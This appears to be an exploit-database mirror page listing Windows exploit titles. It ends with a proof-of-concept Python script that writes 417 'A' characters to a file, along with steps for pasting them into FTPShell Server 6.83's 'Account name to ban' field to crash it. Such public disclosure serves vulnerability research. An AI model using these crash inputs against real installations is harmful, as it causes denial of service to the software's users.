Menu

Improved exploit search engine. Try python and hit enter

"FTPShell Server 6.83 - 'Account name to ban' Denial of Service (PoC)"

Author

"Victor Mondragón"

Platform

windows

Release date

2019-02-20

Release Date Title Type Platform Author
2019-03-21 "DVD X Player 5.5.3 - '.plf' Buffer Overflow" local windows "Paolo Perego"
2019-03-21 "Canarytokens 2019-03-01 - Detection Bypass" dos windows "Gionathan Reale"
2019-03-20 "NetShareWatcher 1.5.8.0 - Local SEH Buffer Overflow" local windows "Peyman Forouzan"
2019-03-19 "Advanced Host Monitor 11.92 beta - Local Buffer Overflow" local windows "Peyman Forouzan"
2019-03-19 "Microsoft Edge - Flash click2play Bypass with CObjectElement::FinalCreateObject" dos windows "Google Security Research"
2019-03-19 "Microsoft VBScript - VbsErase Memory Corruption" dos windows "Google Security Research"
2019-03-19 "Microsoft Internet Explorer 11 - VBScript Execution Policy Bypass in MSHTML" dos windows "Google Security Research"
2019-03-18 "WinAVI iPod/3GP/MP4/PSP Converter 4.4.2 - Denial of Service" dos windows Achilles
2019-03-18 "WinMPG Video Convert 9.3.5 - Denial of Service" dos windows Achilles
2019-03-15 "Mail Carrier 2.5.1 - 'MAIL FROM' Buffer Overflow" remote windows "Joseph McDonagh"
2019-02-22 "WinRAR 5.61 - Path Traversal" local windows WyAtu
2019-03-14 "FTPGetter Standard 5.97.0.177 - Remote Code Execution" remote windows w4fz5uck5
2019-03-13 "Apache Tika-server < 1.18 - Command Injection" remote windows "Rhino Security Labs"
2019-03-13 "Microsoft Windows MSHTML Engine - _Edit_ Remote Code Execution" local windows "Eduardo Braun Prado"
2019-03-13 "Core FTP Server FTP / SFTP Server v2 Build 674 - 'SIZE' Directory Traversal" dos windows "Kevin Randall"
2019-03-13 "Core FTP Server FTP / SFTP Server v2 Build 674 - 'MDTM' Directory Traversal" dos windows "Kevin Randall"
2019-03-13 "Microsoft Windows - .reg File / Dialog Box Message Spoofing" dos windows hyp3rlinx
2019-03-11 "PRTG Network Monitor 18.2.38 - Authenticated Remote Code Execution" webapps windows M4LV0
2019-03-11 "NetSetMan 4.7.1 - Local Buffer Overflow (SEH Unicode)" local windows "Devin Casadey"
2019-03-12 "Core FTP 2.0 build 653 - 'PBSZ' Denial of Service (PoC)" dos windows Hodorsec
2019-03-08 "McAfee ePO 5.9.1 - Registered Executable Local Access Bypass" webapps windows leonjza
2019-03-07 "Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH)" local windows Hodorsec
2019-03-04 "MarcomCentral FusionPro VDP Creator < 10.0 - Directory Traversal" webapps windows 0v3rride
2019-03-04 "Splunk Enterprise 7.2.4 - Custom App RCE (Persistent Backdoor - Custom Binary Payload)" webapps windows "Matteo Malvica"
2019-03-04 "STOPzilla AntiMalware 6.5.2.59 - Privilege Escalation (2)" local windows "Ivan Ivanovic"
2019-03-04 "Microsoft Edge Chakra 1.11.4 - Read Permission via Type Confusion" dos windows "Fahad Aid Alharbi"
2019-03-01 "Cisco WebEx Meetings < 33.6.6 / < 33.9.1 - Privilege Escalation" local windows SecureAuth
2019-02-28 "TransMac 12.3 - Denial of Service (PoC)" dos windows "Alejandra Sánchez"
2019-02-25 "Xlight FTP Server 3.9.1 - Buffer Overflow (PoC)" dos windows "Logan Whitmire"
2019-02-22 "Nuuo Central Management - Authenticated SQL Server SQL Injection (Metasploit)" remote windows Metasploit
Release Date Title Type Platform Author
2019-02-20 "FTPShell Server 6.83 - 'Account name to ban' Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-02-19 "BulletProof FTP Server 2019.0.0.50 - 'SMTP Server' Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-02-19 "Valentina Studio 9.0.4 - 'Host' Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-02-19 "NetSetMan 4.7.1 - 'Workgroup' Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-02-15 "Navicat for Oracle 12.1.15 - _Password_ Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-02-15 "Free IP Switcher 3.1 - 'Computer Name' Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-02-14 "Core FTP/SFTP Server 1.2 Build 589.42 - 'User domain' Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-02-05 "Device Monitoring Studio 8.10.00.8925 - Denial of Service (PoC)" dos windows "Victor Mondragón"
2018-11-12 "HeidiSQL 9.5.0.5196 - Denial of Service (PoC)" dos windows "Victor Mondragón"
2018-11-05 "Softros LAN Messenger 9.2 - Denial of Service (PoC)" dos windows_x86-64 "Victor Mondragón"
2018-11-01 "WebDrive 18.00.5057 - Denial of Service (PoC)" dos windows_x86-64 "Victor Mondragón"
2018-10-31 "SmartFTP Client 9.0.2615.0 - Denial of Service (PoC)" dos windows_x86-64 "Victor Mondragón"
2018-08-30 "NetworkActiv Web Server 4.0 Pre-Alpha-3.7.2 - 'Username' Denial of Service (PoC)" dos windows_x86-64 "Victor Mondragón"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/46430/?format=json')
For full documentation follow the link above

Ads

Browse exploit DB API Browse

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
#Exploit Title: FTPShell Server 6.83 - Denial of Service (PoC)
#Discovery by: Victor Mondragón
#Discovery Date: 2018-02-20
#Vendor Homepage: http://www.ftpshell.com/index.htm
#Software Link: http://www.ftpshell.com/downloadserver.htm
#Tested Version: 6.83
#Tested on: Windows 7 x64 Service Pack 1

#Steps to produce the crash:
#1.- Run python code: FTPShell_Server_6.83.py
#2.- Open ftpshell.txt and copy content to clipboard
#3.- Open FTPShell Server
#4.- Select "Manage FTP Accounts"
#5.- Select "Add Account Name" > in "Account name to ban" Paste Clipboard
#6.- Click on "Ok"
#7.- Crashed

cod = "\x41" * 417	

f = open('ftpshell.txt', 'w')
f.write(cod)
f.close()